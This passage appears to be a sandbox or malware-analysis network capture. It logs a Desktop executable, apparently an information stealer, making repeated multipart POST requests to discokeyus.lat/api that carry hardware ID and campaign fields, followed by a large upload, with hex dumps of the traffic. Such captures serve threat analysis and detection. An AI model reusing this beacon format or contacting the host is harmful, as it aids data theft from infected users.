  Data Raw: 79 4e 58 66 6a 4f 79 62 58 52 69 6e 46 67 6a 6a 44 6d 52 6f 6b 68 4e 47 4f 7a 38 41 46 49 53 52 38 42 4b 71 45 37 7a 4d 78 68 37 5a 67 41 2f 45 36 52 6b 59 58 32 44 64 79 4f 4d 63 59 62 6c 55 41 6b 61 37 62 70 55 47 42 70 53 79 6b 6d 79 42 37 70 39 45 47 41 30 57 58 49 35 70 6e 68 38 62 34 6c 61 4b 49 77 33 6d 4b 35 44 52 52 72 6b 38 51 4e 55 55 77 36 4f 51 37 68 4f 35 54 4d 78 61 44 56 50 66 44 79 2f 61 57 67 72 6b 52 67 33 77 7a 61 56 36 78 45 4a 48 75 72 78 43 46 67 66 51 4d 70 4a 6f 42 79 79 64 42 68 71 4c 55 70 31 4e 62 4e 30 65 32 43 42 55 44 79 50 50 34 75 75 57 31 74 64 72 37 6f 4c 51 46 4d 59 6a 6e 4b 6e 48 71 31 77 58 56 49 77 57 32 6b 35 75 58 4d 7a 64 4d 42 50 62 6f 51 39 32 66 4d 4a 54 78 4c 6f 2b 51 4e 5a 47 6b 7a 44 51 61 6b 4c 76 48 55 62
  Data Ascii: yNXfjOybXRinFgjjDmRokhNGOz8AFISR8BKqE7zMxh7ZgA/E6RkYX2DdyOMcYblUAka7bpUGBpSykmyB7p9EGA0WXI5pnh8b4laKIw3mK5DRRrk8QNUUw6OQ7hO5TMxaDVPfDy/aWgrkRg3wzaV6xEJHurxCFgfQMpJoByydBhqLUp1NbN0e2CBUDyPP4uuW1tdr7oLQFMYjnKnHq1wXVIwW2k5uXMzdMBPboQ92fMJTxLo+QNZGkzDQakLvHUb
2024-12-20 16:05:42 UTC  1369               IN
  Data Raw: 77 70 39 47 41 39 63 73 35 52 49 73 4e 70 32 61 68 4f 53 68 7a 72 38 77 42 58 46 45 54 63 54 71 63 63 76 48 49 55 62 69 70 59 63 6a 2b 2b 66 6e 70 6d 67 6c 73 70 68 44 36 63 36 77 63 4a 47 76 6d 36 56 42 67 79 54 63 56 49 2b 31 54 39 62 46 46 36 5a 6c 39 7a 63 75 77 2f 63 32 47 4c 58 43 4f 41 50 70 71 35 53 45 38 50 34 66 63 47 53 68 6c 4c 79 30 6d 74 41 37 35 31 47 57 67 71 53 6e 59 79 74 33 51 7a 4a 63 35 52 4e 73 4e 70 32 59 68 65 58 78 66 6d 39 68 70 54 45 6b 50 59 53 62 42 4f 38 7a 4d 4f 5a 44 63 59 4a 79 53 6b 61 48 52 30 77 45 39 75 68 44 33 5a 38 77 6c 50 46 4f 66 39 43 6c 59 42 52 63 68 4c 72 77 65 30 64 78 64 67 4a 6c 78 37 4e 62 46 38 66 32 43 4a 56 53 47 48 4f 4a 65 69 52 67 6c 54 6f 66 30 55 47 45 73 41 37 31 2b 6a 41 72 41 7a 41 43 30 2f 47
  Data Ascii: wp9GA9cs5RIsNp2ahOShzr8wBXFETcTqccvHIUbipYcj++fnpmglsphD6c6wcJGvm6VBgyTcVI+1T9bFF6Zl9zcuw/c2GLXCOAPpq5SE8P4fcGShlLy0mtA751GWgqSnYyt3QzJc5RNsNp2YheXxfm9hpTEkPYSbBO8zMOZDcYJySkaHR0wE9uhD3Z8wlPFOf9ClYBRchLrwe0dxdgJlx7NbF8f2CJVSGHOJeiRglTof0UGEsA71+jArAzAC0/G
2024-12-20 16:05:42 UTC  1369               IN
  Data Raw: 34 61 79 76 57 46 67 36 49 4a 35 79 73 58 77 73 6f 34 76 51 43 58 77 55 41 30 58 76 75 54 72 4a 70 58 7a 73 66 51 54 38 31 75 44 38 72 4b 35 74 52 4c 6f 51 72 6a 36 78 46 57 42 62 73 39 69 35 58 46 46 62 4e 53 36 4d 66 74 44 38 55 62 6d 59 57 50 7a 57 73 50 79 73 72 6f 56 45 34 67 42 36 61 75 6b 41 4a 55 36 48 39 47 68 68 4c 41 50 41 45 73 67 32 74 63 42 42 79 47 42 67 6e 4b 34 6f 2f 65 48 32 4a 52 69 32 56 4f 70 53 6e 57 48 64 64 75 61 35 65 43 6b 45 53 6e 46 76 67 45 59 49 39 58 32 4a 6d 41 45 59 72 39 47 6b 7a 4d 39 77 59 62 70 46 78 77 65 73 4f 53 67 2f 7a 2f 41 39 4f 45 41 66 77 65 6f 63 59 74 33 51 50 5a 44 46 58 50 33 7a 30 63 44 4d 7a 74 78 59 6e 68 43 71 49 76 55 52 5a 47 71 48 46 51 68 67 4c 41 4a 59 45 6c 51 32 7a 66 52 68 31 4e 78 56 59 4a 4c
  Data Ascii: 4ayvWFg6IJ5ysXwso4vQCXwUA0XvuTrJpXzsfQT81uD8rK5tRLoQrj6xFWBbs9i5XFFbNS6MftD8UbmYWPzWsPysroVE4gB6aukAJU6H9GhhLAPAEsg2tcBByGBgnK4o/eH2JRi2VOpSnWHddua5eCkESnFvgEYI9X2JmAEYr9GkzM9wYbpFxwesOSg/z/A9OEAfweocYt3QPZDFXP3z0cDMztxYnhCqIvURZGqHFQhgLAJYElQ2zfRh1NxVYJL
2024-12-20 16:05:42 UTC  1369               IN
  Data Raw: 73 46 63 6a 6a 48 32 58 6f 45 6c 4f 44 66 66 68 51 46 41 51 57 74 52 36 6e 69 57 78 64 52 68 35 49 56 35 5a 45 76 51 78 4d 32 54 4f 44 68 66 44 65 64 6d 55 42 77 6b 46 6f 61 4a 4d 62 52 42 4f 77 45 4f 32 48 2f 42 62 50 46 6b 63 47 6c 4d 31 6f 54 31 48 62 4a 35 48 4a 59 34 39 32 65 55 4a 54 31 32 35 71 6b 49 59 46 31 47 4f 48 50 42 63 35 69 5a 4d 4e 48 59 4b 59 48 79 74 50 32 55 72 31 67 52 67 77 79 50 5a 38 77 6b 4f 48 76 50 6f 43 6c 73 46 51 34 6c 36 6e 69 6d 7a 64 42 35 31 4e 6b 39 77 44 49 70 71 63 47 57 41 55 54 69 53 63 64 66 72 52 67 6c 46 32 4c 70 45 47 43 77 4f 6a 6c 7a 67 56 76 31 47 48 47 30 6f 58 32 6b 6a 2b 56 68 39 62 49 39 41 50 70 51 2b 32 65 55 4a 54 31 32 35 71 45 49 59 46 31 47 4f 48 50 42 63 35 69 5a 4d 4e 48 59 4b 59 48 79 74 50 32 55
  Data Ascii: sFcjjH2XoElODffhQFAQWtR6niWxdRh5IV5ZEvQxM2TODhfDedmUBwkFoaJMbRBOwEO2H/BbPFkcGlM1oT1HbJ5HJY492eUJT125qkIYF1GOHPBc5iZMNHYKYHytP2Ur1gRgwyPZ8wkOHvPoClsFQ4l6nimzdB51Nk9wDIpqcGWAUTiScdfrRglF2LpEGCwOjlzgVv1GHG0oX2kj+Vh9bI9APpQ+2eUJT125qEIYF1GOHPBc5iZMNHYKYHytP2U
2024-12-20 16:05:42 UTC  1369               IN
  Data Raw: 6f 34 2b 6e 75 6c 70 54 67 76 69 75 6b 49 59 48 77 43 57 42 4b 45 45 72 58 34 51 5a 47 70 66 5a 54 58 30 4d 54 4e 6c 7a 67 35 75 67 6a 75 4a 70 6b 5a 4f 55 65 66 30 41 68 67 4d 44 74 63 45 74 6b 37 6c 49 46 45 6a 4e 42 67 6e 63 76 4e 38 59 58 6d 49 56 54 69 41 64 71 65 56 5a 46 73 61 38 66 6c 4f 61 52 35 45 32 46 47 6a 48 72 70 4e 49 55 34 30 58 32 38 78 39 6b 35 6c 61 49 35 59 4b 63 4e 2f 32 62 4d 4a 45 56 33 4d 36 41 74 49 45 41 43 41 42 4b 78 4f 35 54 4d 53 63 53 46 49 66 48 36 7a 5a 58 51 72 6b 52 67 33 77 79 66 5a 38 78 6f 48 58 66 4f 36 56 42 68 55 54 73 4e 46 6f 77 43 2b 59 51 31 6c 4a 55 35 38 64 59 70 42 58 6e 6d 4a 52 69 33 42 41 4a 53 76 58 31 77 65 38 66 30 79 5a 6a 35 53 79 56 53 6a 54 4a 46 30 45 6d 38 59 5a 6b 67 6a 73 32 38 78 54 59 31 41
  Data Ascii: o4+nulpTgviukIYHwCWBKEErX4QZGpfZTX0MTNlzg5ugjuJpkZOUef0AhgMDtcEtk7lIFEjNBgncvN8YXmIVTiAdqeVZFsa8flOaR5E2FGjHrpNIU40X28x9k5laI5YKcN/2bMJEV3M6AtIEACABKxO5TMScSFIfH6zZXQrkRg3wyfZ8xoHXfO6VBhUTsNFowC+YQ1lJU58dYpBXnmJRi3BAJSvX1we8f0yZj5SyVSjTJF0Em8YZkgjs28xTY1A


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49706 | 172.67.197.170 | 443 | 4208 | C:\Users\user\Desktop\zhQFKte2vX.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:05:44 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5QXR01HVP5LF9RR6L2B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12850
Host: discokeyus.lat
2024-12-20 16:05:44 UTC | 12850 | OUT | Data Raw: 2d 2d 35 51 58 52 30 31 48 56 50 35 4c 46 39 52 52 36 4c 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 51 58 52 30 31 48 56 50 35 4c 46 39 52 52 36 4c 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 51 58 52 30 31 48 56 50 35 4c 46 39 52 52 36 4c 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii: --5QXR01HVP5LF9RR6L2BContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--5QXR01HVP5LF9RR6L2BContent-Disposition: form-data; name="pid"2--5QXR01HVP5LF9RR6L2BContent-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-20 16:05:45 UTC | 1141 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:05:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=b5t0kqkfqc1t74fi1ahbd9msj7; expires=Tue, 15 Apr 2025 09:52:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2BQ59XTg5L5nUkbTdofqCdoSMNQvY%2Fafi4Ek%2BPT%2FYPFktZ6xvlPW8YRs%2F0Au7Zma3beLLYppKtkoDaBXsEGPl%2BU5NObr2kA64e4gII8ETl2A4Af%2B%2FcbXGgP4nyQBs%2Ff6eQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50e02b5b8c4337-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1684&rtt_var=640&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13789&delivery_rate=1698662&cwnd=222&unsent_bytes=0&cid=425575ade6693dce&ts=1187&x=0"
2024-12-20 16:05:45 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:05:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49707 | 172.67.197.170 | 443 | 4208 | C:\Users\user\Desktop\zhQFKte2vX.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:05:47 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SJYCOTWQ7D4WOJWAAFB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15082
Host: discokeyus.lat
2024-12-20 16:05:47 UTC | 15082 | OUT | Data Raw: 2d 2d 53 4a 59 43 4f 54 57 51 37 44 34 57 4f 4a 57 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 4a 59 43 4f 54 57 51 37 44 34 57 4f 4a 57 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 4a 59 43 4f 54 57 51 37 44 34 57 4f 4a 57 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii: --SJYCOTWQ7D4WOJWAAFBContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--SJYCOTWQ7D4WOJWAAFBContent-Disposition: form-data; name="pid"2--SJYCOTWQ7D4WOJWAAFBContent-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-20 16:05:48 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:05:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ngpue2rca2qr5kej9acs4fqcbt; expires=Tue, 15 Apr 2025 09:52:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xNryH63ijPpwVMBwHzPgUf8ClWlQAJ6wCvV%2B4lNCm393T%2FteKg9OIXh0yKfKx7hyZmP%2FaHsDxeFasqVr38HOe3a%2FXJPmp9bU4SDtLmmPmS%2BIkMMwbKyprmpLZlCcdBsxw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50e03b2d998c05-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1795&rtt_var=691&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2833&recv_bytes=16021&delivery_rate=1564844&cwnd=215&unsent_bytes=0&cid=90c984f281120bcf&ts=978&x=0"
2024-12-20 16:05:48 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:05:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49709 | 172.67.197.170 | 443 | 4208 | C:\Users\user\Desktop\zhQFKte2vX.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:05:49 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ERVH1N0HJQ8CFI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20377
Host: discokeyus.lat
2024-12-20 16:05:49 UTC | 15331 | OUT | Data Raw: 2d 2d 45 52 56 48 31 4e 30 48 4a 51 38 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 52 56 48 31 4e 30 48 4a 51 38 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 52 56 48 31 4e 30 48 4a 51 38 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 45 52 56 48 31 4e 30 48
Data Ascii: --ERVH1N0HJQ8CFIContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--ERVH1N0HJQ8CFIContent-Disposition: form-data; name="pid"3--ERVH1N0HJQ8CFIContent-Disposition: form-data; name="lid"PsFKDg--pablo--ERVH1N0H
2024-12-20 16:05:49 UTC | 5046 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00
Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-20 16:05:51 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:05:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hjcehs4vbm7245m4pm2vl4127t; expires=Tue, 15 Apr 2025 09:52:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W%2BoQwjy3NQoqHz%2Bu8P%2Bo42I9kgTal7IhjyP6gDtqkZ7V2DsFmhl2E3Uo6%2BQNZ2kyWb3CClQvsSoH8ixVHuzPfi4gXvEa4PswVZ%2FGRphRhNGLBWG5Tsh9osrqsPBc7FertQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50e04a58e60f8f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1661&rtt_var=642&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21333&delivery_rate=1681059&cwnd=232&unsent_bytes=0&cid=94fac26db648e246&ts=1886&x=0"
2024-12-20 16:05:51 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:05:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49712 | 172.67.197.170 | 443 | 4208 | C:\Users\user\Desktop\zhQFKte2vX.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:05:53 UTC | 270 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Z384R315D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1171
Host: discokeyus.lat
2024-12-20 16:05:53 UTC | 1171 | OUT | Data Raw: 2d 2d 5a 33 38 34 52 33 31 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 33 38 34 52 33 31 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 33 38 34 52 33 31 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 33 38 34 52 33 31 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
Data Ascii: --Z384R315DContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--Z384R315DContent-Disposition: form-data; name="pid"1--Z384R315DContent-Disposition: form-data; name="lid"PsFKDg--pablo--Z384R315DContent-Disp
2024-12-20 16:05:54 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:05:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6ati7qvk633ko2kk6hgdnefh2r; expires=Tue, 15 Apr 2025 09:52:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKLenlW%2B50sG%2BzZXoTPaOsr4XVQmYN5ZDrDPa7DKI86NSQf9y7dL6A2ynGZ4D9orE0uTL19WcUqoqzIEhRwAvoUbBfgO3yb2MFdzHzTtWmichnf3TJ%2FgfFq4tdXHhtMw7w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50e0611c3b78db-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1970&rtt_var=749&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2077&delivery_rate=1450571&cwnd=237&unsent_bytes=0&cid=bbd788aa3414a79f&ts=1698&x=0"
2024-12-20 16:05:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:05:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                  Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49713 | Destination IP: 172.67.197.170 | Destination Port: 443 | PID: 4208 | Process: C:\Users\user\Desktop\zhQFKte2vX.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2024-12-20 16:05:56 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=V2B0YK8QWEUAT
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 551360
                                                                                                                                  Host: discokeyus.lat
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 2d 2d 56 32 42 30 59 4b 38 51 57 45 55 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 32 42 30 59 4b 38 51 57 45 55 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 32 42 30 59 4b 38 51 57 45 55 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 32 42 30 59 4b 38 51 57 45 55
                                                                                                                                  Data Ascii: --V2B0YK8QWEUATContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--V2B0YK8QWEUATContent-Disposition: form-data; name="pid"1--V2B0YK8QWEUATContent-Disposition: form-data; name="lid"PsFKDg--pablo--V2B0YK8QWEU
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 6e b3 1e e1 77 3c cc 85 a9 fb 87 80 b5 a3 a3 02 4a 2f 18 df 13 7d 29 76 b0 da fb 1b a0 0c 81 7e c1 68 19 67 3a 43 1d 3c 67 7b 8e 7e ff b1 61 1b 10 04 cc 24 99 b1 5e d0 9f 32 0b fb e2 20 72 a2 d4 02 23 4c c0 7a 1c 70 17 3f 28 f1 f4 0b 2f bc 71 d8 a8 2b 37 a6 5b ec 00 69 aa 0b 9a 7f 00 e6 f1 f7 78 16 3f 61 3a a5 cc 6a 94 ed 19 34 5c 85 1d 3c d1 1d cc 03 a7 54 7d bf 58 aa ed 29 74 fe f3 47 cf 95 e7 c1 29 37 ca 03 9a bb 6f 48 56 0f 5e 5c e5 af b4 9a 8d 64 d8 1c 7d 04 54 b5 e7 bf 9f 96 00 6b b6 f2 f5 1b 11 a3 3f 81 52 54 e8 c0 9c 9c 99 c0 7a bc 8b fa 2a 00 ba af d1 33 6e 69 dc cb a6 48 8c c7 0f 42 ce 8c 3e 78 c9 03 81 ca 8b 38 ba e6 63 90 c5 37 cd 07 5a 6c 22 d8 7e 60 ad 97 27 ef 04 89 1b fe c7 a2 e9 be 09 97 71 ee c3 eb fb 77 61 43 8b 34 fc 78 1e 9d 88 8c 6a
                                                                                                                                  Data Ascii: nw<J/})v~hg:C<g{~a$^2 r#Lzp?(/q+7[ix?a:j4\<T}X)tG)7oHV^\d}Tk?RTz*3niHB>x8c7Zl"~`'qwaC4xj
